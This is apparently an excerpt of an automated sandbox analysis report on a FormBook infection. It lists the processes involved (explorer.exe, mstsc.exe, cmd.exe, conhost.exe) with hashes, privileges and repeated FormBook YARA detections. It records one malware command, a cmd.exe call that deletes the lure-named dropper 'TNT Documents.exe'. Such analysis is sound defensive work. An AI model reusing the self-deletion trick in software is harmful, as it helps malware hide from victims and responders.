                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:18:58:07
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff662bf0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:58:34
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                  Imagebase:0xec0000
                                                                  File size:3444224 bytes
                                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:18:58:39
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del "C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x870000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:58:41
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff673460000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis
